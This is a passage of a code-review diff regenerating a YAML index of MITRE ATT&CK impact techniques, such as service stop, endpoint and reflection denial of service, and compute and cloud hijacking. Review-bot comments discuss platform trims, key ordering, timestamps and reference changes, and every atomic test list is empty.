Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -57349,39 +58108,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
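Review bot: `identifier: T1489` (the context line just above `atomic_tests: []`) survives the regeneration while the neighbouring T1565.001 and T1499.004 objects carry no `identifier` key at all; if anything consuming the index keys on that field, the generator should emit it for every entry or for none rather than leaving it to whichever objects happened to have it before.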
@@ -57399,13 +58156,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57413,36 +58177,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
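Review bot: T1499.004's `x_mitre_platforms` shrinks from eight entries to four (`Windows`, `IaaS`, `Linux`, `macOS`), dropping Azure AD, Office 365, SaaS and Google Workspace, with `x_mitre_version` bumped from '1.2' to '1.3'. The same removal is applied to T1498.002 and T1499.002 further down, so any per-platform index derived from this file will lose these techniques; please confirm those derived indexes are regenerated in the same change and that the drop is the intended upstream platform consolidation (the T1657 hunk in this diff shows Office 365 and Google Workspace being replaced by `Office Suite`).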
@@ -57451,11 +58206,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -57464,17 +58225,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
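Review bot: The T1565.003 block loses `x_mitre_permissions_required` (`User`, `Administrator`, `root`, `SYSTEM`) outright; unlike the surrounding key reorders this is a field removal, so check whether anything consuming the index reads it before merging. The FireEye APT38 reference here again switches to the mandiant.com PDF, matching the T1565.001 change, which supports treating the URL refresh as upstream data rather than an edit made in this PR.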
@@ -57483,6 +58258,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -57498,17 +58274,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
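Review bot: The `- x_mitre_modified_by_ref` deletion on T1498.002 is only a move (the key reappears after `x_mitre_attack_spec_version` at the end of the object in a later hunk), but read on its own this hunk looks like the field was dropped. Combined with the platform trim (Azure AD, Office 365, SaaS, Google Workspace removed) and the '1.3' to '1.4' bump, that is three different kinds of change in one hunk; a stable key order in the generator would reduce it to the platform and version lines.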
@@ -57518,14 +58289,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -57534,28 +58306,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
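Review bot: The external_references reshuffle for T1498.002 (Cisco DoSdetectNetflow moved to the top, Cloudflare ReflectionDoS and Memcrashed moved into the middle) changes no reference content, only order; if the generator preserves upstream STIX ordering this is expected, otherwise sorting references by `source_name` would keep future diffs readable. The citation text still carries the upstream spellings ('Majkowsk', 'DNSamplficationDoS', 'amplificaiton'); leave those untouched here, since `source_name` values are keys into the ATT&CK data and any local fix would be reverted on the next regeneration.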
@@ -57566,7 +58338,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57577,17 +58348,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57624,7 +58390,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -57645,7 +58412,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
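Review bot: T1491's `modified` timestamp moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-03-25T19:34:42.056Z', and the same happens to T1491.001 later in the diff ('2022-11-08' to '2022-07-28'). A regeneration that makes an object older is unusual; confirm the source bundle is the intended one and that these two objects were not simply left at a pre-update state (T1491.001 also keeps `x_mitre_attack_spec_version: 2.1.0` in the context of the last hunk while every other object here moves to 3.2.0).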
@@ -57672,12 +58439,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
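Review bot: The new T1496.002 (Bandwidth Hijacking) object is inserted directly after T1491 rather than next to the other T1496.* sub-techniques, which land much later after T1491.001; the file is evidently not sorted by technique ID, so sorting in the generator would keep siblings together and make insertions land predictably. Two smaller points in the same hunk: `x_mitre_detection: ''` is an empty string rather than an omitted key (consumers should treat both as "no detection text"), and the GoBotKR reference description contains a non-breaking hyphen in 'backdoor‑laced' copied from upstream, harmless in YAML but invisible to a plain-hyphen search.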
@@ -57710,7 +58543,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -57720,10 +58553,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
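Review bot: T1657's platform list replaces `Office 365` and `Google Workspace` with a single `Office Suite` entry and bumps `x_mitre_version` to '1.2'; this is the consolidation that explains the platform removals on T1499.004, T1498.002 and T1499.002 elsewhere in the diff, so a one-line mention in the PR description would stop readers taking those removals for data loss.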
@@ -57786,7 +58618,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -57827,7 +58658,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -57848,9 +58679,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
